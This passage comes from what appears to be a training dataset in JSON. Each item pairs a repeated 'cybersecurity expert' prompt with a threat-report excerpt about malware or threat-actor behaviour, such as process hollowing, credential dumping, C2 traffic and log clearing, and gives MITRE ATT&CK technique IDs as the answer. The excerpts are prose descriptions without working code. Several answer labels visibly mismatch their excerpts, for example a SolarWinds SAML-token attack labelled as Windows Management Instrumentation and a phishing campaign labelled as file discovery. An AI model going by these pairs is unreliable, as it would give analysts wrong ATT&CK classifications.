in the file, it is generated randomly by the malware - a list of processes into which code is injected (iproc) - the frequency and time for task execution / backup logs / connection to the C&C ([TIME]) - the IP addresses of other computers on the network ([CW_LOCAL]) - the C&C server addresses ([CW_INET]) - the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u2018microsoft-cache\u2019 domain was used by the malware variant that communicated over HTTP. We found four unique samples communicating with this domain, which resolved to the same Hong Kong-based IP address used by the first two domains", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"When the Trojan runs as an executable within the \"\"DsvHelper\"\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"\"R\"\" resource and called function in the new payload is named \"\"RPe.Test.Work\"\". The function will take another executable embedded in the initial Trojan as a resource named \"\"M\"\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\"", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It iterates over all possible Office <version> values for both Word and Excel <product> values. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The malware moves each located document into the AppData folder, inserts malicious Word or Excel macros into it using a Microsoft.Office.Interop object, and then moves the document back into its original folder. In the samples we analyzed, the injected macros were simple downloaders", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\"\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar\"", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If this is successful, the malware creates a :0 alternate data stream in the executable and copies the executable\u2019s own contents to the stream. This can be used to restore the executable later. Then the malware replaces the contents of the executable with a copy of itself and launches the service. The file modified time of the executable is also artificially changed to 00:00:00 UTC. The purpose of this time change is so the file can be identified and restored by the decryption tool", + "output": "- T1070.006: Indicator Removal - Timestomp" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware\u2019s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network. It was a ddos tool compiled to run on ARM systems", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim's network by copying itself over network shares", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This \u2018connection bouncer\u2019 tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Compromise website of strategic importance (e.g. websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory", + "output": "- T1564: Hide Artifacts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We discovered that TeamTNT gained initial access with the Hildegard malware by executing commands on kubelets that allow anonymous access. This was achieved by accessing the kubelet\u2019s run command API and executing commands on running containers", + "output": "- T1609: Container Administration Command\n- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers. Due to their reliance on IE, these malware families intentionally configure the browser settings by modifying the following registry entries", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. This version of mimikatz did not require any command line arguments, most likely in an attempt to avoid detection based on command-line auditing. The dumped hashes were used to authenticate to other machines via pass the hash", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After gaining access to the victim\u2019s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool. The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port. The tunnel is authenticated using the attacker\u2019s private key", + "output": "- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server", + "output": "- T1105: Ingress Tool Transfer\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers. In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm. These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group\u2019s more traditional attack methods (spear phishing and credential phishing", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The ROKRAT samples used during the two \"\"Evil New Year\"\" and the \"\"North Korean Human Rights\"\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"\"System manufacturer\"\" value is used to identify the type of machine. The source code only considers the following machine types\"", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The DNS response will return a CNAME record that points to a Command and Control (C2) domain. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors\u00a0leveraged\u00a0publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on\u00a0victim networks to collect Active Directory information and credentials. WMIC commands\u00a0have been used\u00a0to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to\u00a0res.txt. The actors used the\u00a0Nltest\u00a0command to list domain controllers", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques", + "output": "- T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the /reset flag to reset the executable\u2019s permissions, then using takeown.exe with the /F flag to take ownership of the executable", + "output": "- T1007: System Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the \u201cUPX. string, it has been replaced with \u201cLSD. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "According to Group-IB's Threat Intelligence & Attribution system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. Starting from at least February 23, 2021, a device inside the company's network communicated with a server with the IP address 185[.]118[.]166[.]66. The threat actor collected information inside the local network, including names of network resources and their addresses. Below are examples of commands that were used for lateral movement: . The name of the campaign, ColunmTK, is derived from these initially discovered domains. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It then issues a SOAP request to delete the processed email. This completes the process in which the payload receives inbound communications from the actor", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization\u2019s network environment, including process and service names belonging to endpoint protection software", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Prior to 2014, IRON LIBERTY used custom malware, primarily Sysmain, Havex, and xFrost (now known as Karagany), combined with commodity penetration testing and tools", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The Bluetooth functionality in Flamer is encoded in a module called \"\"BeetleJuice\"\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module already has retrieved a list of all the devices IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increase functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - 